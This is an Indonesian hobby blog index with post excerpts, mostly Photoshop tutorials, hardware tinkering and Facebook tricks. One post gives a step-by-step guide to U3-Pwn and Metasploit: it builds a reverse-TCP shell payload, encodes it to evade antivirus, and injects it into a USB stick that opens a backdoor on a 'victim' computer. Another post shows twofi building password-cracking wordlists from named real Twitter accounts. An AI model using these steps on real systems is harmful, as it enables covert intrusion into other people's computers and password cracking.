Membuat Wordlist Dengan TWOFI di Backtrack

Siapa yg tak kenal dengan twitter, berdiri sejak tahun 2006 seketika mendapat sambutan luas di dunia maya. Hingga sekarang istilah follow me, RT menjadi kata2 yang rutin diketik dan muncul oleh para usernya, tak hanya hitungan detik, sepersekian sekon jutaan twit terlontar melalui media ini. didukung olehbanyak device yang mendukung aplikasi ini serta kemudahan lainnya, twitter terbukti mampu merombak cara komunikasi kita saat ini. tapi hal ini juga membawa dampak buruk kecanduan pada para penggunanya.

Namun seorang researcher di bidang IT, Joshua Dustin melihat hal ini dengan cara yang berbeda. Dia memandang jutaan kata yang terlontar lewat akun twitter memiliki potensi untuk meng_generate worldlist guna memecahkan enkripsi sebuah data. Dalam blognya ia memperlihatkan bagaimana twitter menjadi gudang kosa kata dalam pembuatan wordlist untuk cracking dan kemudian ia kembangkan menjadi dsatu aplikasi bernama "twofi".
Relevan pemaparan singkat diatas, maka dalam postingan kali ini saya sedikit mengulas bagamana pemakaian twofi...ok here we go

requirement:

• PC/notebook yg sudah memakai Linux OS (dalam hal ini saya menggunakan backtrack 5 r2...blum upgrade)
• Aplikasi twofi
• list user twitter yang akan digunakan dalam proses pembuatan wordlist (sy menggunakan string yg bersumber dr beraneka macam user mulai akun berita hingga public figure yakni "detikcom,tvOneNews,korantempo,desianwar,boediono,enda,tifsembiring,nukman,budip,triomacan2000")

Step
- Login sebagai root dan instal twofi dr repo (jika anda telah menggunakan Backtrack 5 R3, step ini bisa anda skip)

apt-get install twofi

- Jalankan twofi di menu

backtrack - privilege escalation - passwords Attacks - offline Attacks - twofi

disini kita akan lihat beberapa option bantuan tentang penggunaan twofi
-c : akan memperlihatkan jumlah frekuensi kemunculan sebuah kata2 dlm sebuah akun twitter (ex: -c )
-m : set jumlah minimal huruf dalam satu kata yang akan dipilih/filter kedalam file output wordlist (pemakaian: -m 6 utk min 6 huruf/karakter dlm satu kata)
-T : menggunakan sebuah filelist term
-t : menggunakan  term langsung
-U : utk opsi ini anda harus membuat sebuah file txt yang berisi list target user yg akan digunakan dlm proses pembuatan wordlist (ex: -U /root/listuser.txt ).
contoh file list user : download
-u : opsi ini sebagai alternatif dr opsi -T dimana anda hanya perlu menuliskan nama user tanpa harus menggunakan sebuah file  (ex: -u detikcom,tvOneNews,korantempo )
-v : untuk menggunkan mode verbose


- Proses pembuatan wordlistnynya bisa lewat 2 cara:
*penggunaan tanpa file list user:

ruby twofi.rb -m 6 -u detikcom,tvOneNews,korantempo,desianwar,boediono,enda,tifsembiring,nukman,budip >> /root/newlist.lst

*penggunaan dengan file list user:

ruby twofi.rb -m 6 -U /root/listuser.txt >> root/newlist.lst

dan hasilnya wordlist bisa dilihat di folder root

gedit /root/newlist.lst

OK...slamat mencoba

related link:
http://hack.pauvam.com/rssposts/tag/glen-roberts/
http://www.digininja.org/twofi.php

Read more »

U3 UFD Pawned

 Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

 Requirement    :

• UFD yang mendukung U3, ex: UFD bermerk Sandisk, Kingston (tipe lama)...
• Linux yg memiliki Metasploit (ex: Backtrack)
• U3 Tool (ada di repo Backtrack)
• U3 Pwn.tar.gz (http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz)

The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda

apt-get install u3-tool

- Download U3 Pwn.tar.gz

wget http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz

wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz

cd  /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image

Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan

   Enter number: 1

- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.

Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host  yang mendapatkan ip  192.168.56.101 sedangkan korban memiliki IP 192.168.56.1

 Enter Ip Address for reverse listener: 192.168.56.101

 Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1

   Enter the device to change iso image on (example /dev/sde1): /dev/sdb1

                                                                             
          ~    .__ °.__   0       o                    ^   .__ °__  `´       
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__. 
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  | 
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O| 
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____| 
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´ 

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


  Generating Shellcode Please Wait...
|**************************************************| 100%
OK

- Pilih yes untuk menjalan exploit handler

Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...:))

related link:
http://packetstormsecurity.org/files/114502/U3-Pwn-Sandisk-Executable-Injection-Tool.html

Read more »

Ur Group Still Blank!!! take a look this table

related post : penanganan blank facebook group (video tutorial)

Read more »

Long Life My USB Modem

Bila di tanya berapa lama anda menggunkan internet dalam sehari, maka jawaban 1 jam mungkin adalah jawaban yang amat sangat langka saat ini. Di limpahi berbagai kemudahan, mulai dari harga komputer atau notebook yang relatif murah hingga modem portable dengan jaringan 3G yang cukup mumpuni untuk melakukan berbagai kegiatan.

Namun seperti peralatan elektronik lainnya notebook dan usb modem juga akan mengalami perlambanan kinerja jika dalam satu sesi di pakai dalam waktu yang lama dan untuk kerja yang berat. Panas yang dipicu oleh durasi yang berlebihan tak jarang mengakibat kerusakan fisik komponen.
Postingan kali ini saya bakal kasih penampakan modem yang biasa saya gunakan...mudah-mudahan bisa memberi inspirasi buat oprek2 modem anda...

Spoiler

 Tampilan setengah jadi sebelum dipasangi external antenna

Part bekas heatsink power supply buat jadi docking (dudukan)

heatsink bekas processor PI

setelah di potong menjadi dua bagian

kawat tembaga untuk menjepit modem dengan bagian heatsink

Tampilan jadi yang sudah menggunakan eksternal antenna

nb: cara membuat sendiri pigtail external antenna bisa di temukan disini 

Read more »

penanganan blank facebook group (video tutorial)

Beberapa waktu yang lalu, dibeberapa group facebook merebak sebuah fenomena baru yakni kosongnya halaman group. Posting status hingga komentar dari member ataupun admin dr group tersebut. Merujuk pada salah satu group yang saya ikuti masalah ini terjadi lantaran adanya malicious code dalam note fb (note blank) yg dishare atau di post dalam komentar di dalam group.Setelah melakukan googling dan searching, akhirnya ditemukan cara-cara yang bisa digunakan untuk mengatasinya.

ada bebrapa catatan yg patut diperhatikan sebelum mengikuti tutorial ini:

• Serangan yg dilakukan dalam tutorial ini dilakukan pada group yg saya buat sendiri (bukan ke group lain).
• Link url note fb yg digunakan bukan milik saya dan mungkin saja saat ini sudah dihapus oleh pemilikna. 
• Penghapusan posting yang bersifat "status" yg bermasalah hanya dapat dilakukan admin group, sedangkan penghapusan komentar yang mengandung url note blank bisa di hapus oleh pengomentar sendiri (tidak harus admin)
• di dalam "test blank" group dlm video di bawah yg menjadi penyerang sekaligus admin group adalah blogger sendiri.

thanks to: Balikita Forum (andre pangestu, wi, al kahfi dkk), Hacker Community (Mulyana sandi, Pak de agus purnomo, bli Putu Shinoda dkk), X-calibur (rastri, dkk)

related post: Ur Group Still Blank!!! take a look this table

Read more »

Water Drop Sensation (basic photoshop tutorial)

  

Dari sekian banyak gambar yang telah dibuat di akhir tahun 2011, mungkin gambar yang satu inilah yang paling saya jagokan. Sebenarnya ini berawal dari percakapan di inet tentang typograph. Alhasil tercetuslah ide untuk membuat sebuah typograph (seni gambar abjad dan simbol) yang sama sekali tidak biasa. Berbekal beberapa lembar catatan tutorial akhirnya project inipun sukses terpublish.

Di posting kali ini saya mencoba untuk mengulang kembali bagaimana dasar pembuatannya...n here we go

yang diperlukan:

- Gambar background

- Photoshop (terserah versi berapa)

- Minuman dingin (biar makin kerasa sensasi waternya)...

Kalau sudah lengkap semua ...baru, saya persilahkan menyaksikan video tutor di bawah ini ..

*beberapa setting yang perlu diperhatikan dilbagian layer option
- drop shadow

- inner shadow

- inner glow

- bevel and emboss

- contour

- exclusion layer blending mode

Yups..slamat berkreasi...
P.S: musik latar >> careless wishper ny seether

Read more »

Making lightning thunder (Video tutorial)

Eits udah minggu...jadwalny posting (lagi) ini.
Kali ini rada beda dikit tapi masih ga jauh-jauh dr yg namany photoshop. Posting ini mengambil judul "lighting thunder". Idenya sebenarnya jiplakan dr sebuah tutorial di majalah pc mild yg dulu sempat baca, cuma ga sempat beli (lantaran artikel yg lainnya kurang menarik). Alhamdulillah sempat sy catat di kepala serta udah di praktekkin dulunya dan waktu korek-korek folder lama  file .psd nya nemu dan history log di notepad jg masih ad...

Ok.... langsung cekidot aj gan video



Untuk variasiny dengan menggunakan berbagai  macam distort tool....so be creative...try it

P.s: Sorry vid tutorialny blum pake dubbing, soalnya lagi nyari mic yg bagusan dikit biar dubbinganny ga kresek2 plus biar bisa dipake ngerekam score lagu yg baru, klo soundtrackny ntu Soldier & Every body by Ingrid Michaelson #lagi nyandu bgt ane ama ne lagu...

Read more »

Selective Desaturation Effect

Pada postingan kali saya akan membahas salah satu efek editing yang cukup sering digunakan oleh banyak shotoshoper, yakni "selective desaturation".

Inti dari efek ini adalah medesaturation (mengubah rgb gambar hingga terlihat greyscale) object diluar dari object yang dijadikan fokus..dan hasilnya objek yg dijadikan fokus akan terlihat menonjol dari objek lain disekitarnya....let war

the ingredient:

• photoshop
• raw image yg akan di olah.
• minuman ringan....

step:

•  cropping object yg akan dijadikan fokus dengan magnetic lasso tool

• klik kanan bagian dalam objek yg sudah terseleksi oleh magnetic lasso tool, klik inverse
• ok dalam keadaan terseleksi desaturatekan objek dengan mengatur desaturate level di "hue and desaturate".
• lakukan blurring pada bagian tepi objek fokus....ok thats all...

sample:


P.s: this video is from my own youtube channel...*unjuk gigi taring

Read more »

Looks Like Grafitti

Mereka kreatif, energik sekaligus rebel. tapi juga ada yg mendefinisikan mereka dengan kata2 hijau. sadar atau tidak muda adalah satu dari barisan sequence hidup yang sangat berkesan.

Disaat muda passion mencipta dan berkarya berada pada level yang tinggi, akan tetapi tidak banyak yg mewadahinya sehingga daya begitu besar bermuara pada sesuatu yg negatif.

Grafitti mungkin salah satu contohny, coretan2 dinding dengan kata kata yg tidak begitu di pahami maknany terlahir dr tangan mereka2 yg muda. tapi hasilny adalah sebuah karya sampah, lantaran tidak adany keteraturan dan pembagian space yg baik antara satu gambar dengan yang lainny.

Namun coba lihat sisi lainny, sebuah lukisan realis 3d, berukuran jumbo d lukis diwadah yg tidak biasa bukanlah sesuatu yg biasa...ini seni yg luar biasa. permasalahannya sekarang adalah siapa yg mau dindingnya di coret moret oleh tangan2 para artis rebellion ini.

Tertarik akan hal ini (tapi tetap tidak setuju dengan dengan aksi corat moret dinding) saya mendapatkan ide untuk membuat sebuah olahan foto menjadi grafitti. idenya adalah membuat sebuah montase dr beberapa gambar yg di susun sedemikian rupa, sehingga didaptkan ilusi gambaran montase pada layer backgroundnya. trik rahasia dr design kali ini sebenarny simple, yakni menambahkan shadow atau bayangan dr top layer object.....let's war begin

yg perlu d siapin:

•  cut scene dr video one night only-can you feel it tepat nya scen 01:15....*jgn tanya knapa
• 
•  Gantz Advanced Suit.jpg  dari google image searching....*jgn tanya yg penting ini bakalan keren
• 

step (liat no di gambar)

1. jadikan Gantz Advanced Suit.jpg sebagai layer terbawah atw background layer (layer 1).
2. buat layer baru (layer 2), dan shading dgn gradient tool dari abu terang (light grey) ke hitam (black). 
3. crop gambar cut scene dr video dengan magnetic lasso tool dan tempatkan diatas layer shading (layer 2).
4. buat layer baru untuk membuat bayangan, dan kemudian gabung semua layer dan kasih efek blur dikit.

ok....that's all

P.s: grafiiti atw grafiitio sudah dikenal sejak jaman pra-sejarah, terbukti dengan ada lukis gua yg dilakukan oleh manusia cromagnon di eropa...jd ya semacam org2 di jaman ice age 1 gt...

Read more »

Update status via Semaraks (facebook)

Beberapa bulan lalu d blog ini saya menepatkan tab update via "rank boekittinggi", dan saat itu masih belum sempurna. nah...di postingan kali ini saya mencoba membuat script serupa, namun dengan beberapa penambahan fitur dan lebih compact dr sisi tampilannya.

Tanpa banyak bacot....cekidot 

ID Target:

(kosongin buat pos ke wall sendiri)

Jenis Post:

Update Status Post Mp3 Post Gambar

URL Gambar

URL MP3

Judul:

Artist:

Album:

ID Aplikasi:

Luncurkan..

PS: dalam "jenis post" terdapat beberapa pilihan..mp3...juga image (*api key bs d costum)

Read more »

MEMBUAT STATUS DAN KOMEN BIRU (facebook)

Belakangan kembali muncul trik untuk membuat status dan komen biru setelah beberapa trik pendahulu yg serupa tumbang akibat telah dipatch. yup untuk kesempatan kali ini saya akan berikan sedikit clue bagaimana membuat status ataw komen biru....
here the step
1. pastikan anda punya fan page yg mempunyai nama "0" , ataw jika anda mengalami kesulitan membuatnya anda dapat memamfaatkan fan page yg saya buat di http://www.facebook.com/pages/0/193773617336465 dgn cara me like ny (harus d like dulu supaya bisa tampil biru dlm wall atau komen anda)

2. gunakan id dr fan page untuk membuat status biru dgn menulis spt ini
ex: anda ingin membuat status>>

di lihat dr porsinya sy yakin kalau Nasi Kapau Adalah Keajaiban Dunia Ke 8....

dengan kalimat "Nasi Kapau Adalah Keajaiban Dunia Ke 8" yg menjadi biru, maka anda tinggal menulis status:

di lihat dr porsinya sy yakin kalau @[193773617336465:Nasi Kapau Adalah Keajaiban Dunia Ke 8]

bahkan bisa dr 0.facebook.com  (fb gratisan operator)

slamat mencoba...

PS: lebih jelasnya @[193773617336465:Nasi Kapau Adalah Keajaiban Dunia Ke 8] dapat ditafsirkan @[id fan page:tulisan status biru]

Read more »

3 Langkah Atasi Jebakan Short Url

Tak ada yang bisa menyangkal kalau social media seperti twitter atau facebook punya andil yang cukup besar dalam merubah cara komunikasi dunia saat ini. dengan segala fitur dan kemudahaannya kita bisa berbagi informasi-informasi penting ataupun berita di inet, cukup dengan mengklik tombol share mak link halaman web yang kita tuju dengan sendirinya akan dibagikan ke teman-teman tweetter/facebooker berikut dgn komentarny. Dan tentunya para friendlist anda juga akan terbantu dengan link yg kita bagikan.

Tapi siapa sangka, alamat link yg dibagikan di tweet&fb bisa memuat bahaya terhadap kita yang mengklikny. Dan Cukup banyak kasus yg membuktikan bahwa alamat web yg dibagikan memuat link ke penyedia virus, spamm sampai pada konten porno. Kebanyakan mereka yg mengklik umumnya tergiur karena komen akan linkny yang menarik.

Selain itu alamat website yang tidak biasa juga turut berperan dalam menyesatkan para visitornya. link itu bisa terlihat spt http://goo.gl/g15qu , http://tinyurl.com/3ty6xqp , http://bit.ly/jBh8R3

nah...di postingan kali ini sy akan coba memaparkan cara sederhana namun efektif mengantisipasi jebakan short url link. ada 3 langkah untuk bisa aman dari short url link, yakni

1.  Reconnaissance, atw pengumpulan data awal. Yang kita perlukan dalam reconnaissance meliputi tentang siapa pembagi informasi dan menentukan apakah informasi tersebut benar2 kita butuhkan. Bila pembagi informasi kurang memadai kredibilitasnya atw informasi tersebut tidak teralu penting ada baiknya kalau anda mengurungkan niat membuka link tersebut.  tapi bila datany sangat di butuhkan dan kredibilitasny tidak diragukan  maka silahkan melaju ketahap berikutnya.
2. Pre-Checking, yang dimaksudkan pre-checking disini adlh mencek kemana link tersebut akan membawa kita tanpa harus mengklik langsung alamat linkny. berikut ini cara prechecking untuk masing penyediaa layanan :
   • Goo. gl >>bisanya output dari layanan short url Goo.gl akan menghasilkan link seperti ini-  : http://goo.gl/g15qu untuk prechecking anda bisa ketikkan di address bar  http://goo.gl/info/g15qu    (jadi cuma tingal menambahkan /info/ ditengah2 link)
   • tinyURL.com>>alamat yg di generate tinyUrL.com bisanya akan terlihat seperti ini http://tinyURL.com/3ty6xqp untuk melihat alamt asli dari link ini cukup rubah menjadi : http://preview.tinyURL.com/3ty6xqp (cukup menambahkan preview di dalam link) di address bar browser anda
   • bit.ly>>url dari layanan bit.ly biasanya akan terlihat spt ini http://bit.ly/jBh8R3dan untuk mengetahui kemana anda akan diarakan cukup bubuhkan "+" dibelakang alamat tersebut hingga menjadi seperti ini  : http://bit.ly/jBh8R3+ 
3. Identification n make decision, setelah mengetahui alamat asli adri short link url tersebut kita dapat identifikasi apakah link tersebut relevan dengan komen sang pembagi link atw cuma alamat web yang berbahaya anda dan komputer kesayangan anda. Klw anda yakeen ya silahkan buka link tsb...^^

Ok cukup sekian terima kasih,
kalau jarum yang patah jangan disimpan lagi,
kalau ada hati patah jgn sampai g sarapan pagi....C'ya

Read more »

Acer Aspire 4740 VGA Driver Problems

Hari ini tak jauh berbeda dari hari lainnya, kecuali saya kembali menemukan klien dengan permasaalahan yang sama dengan minggu kemaren. Tapi berbekal dengan pengalaman sebelumnya akhirnya bisa diselesaikan.. so what the story...

here it goes.... 

Read more »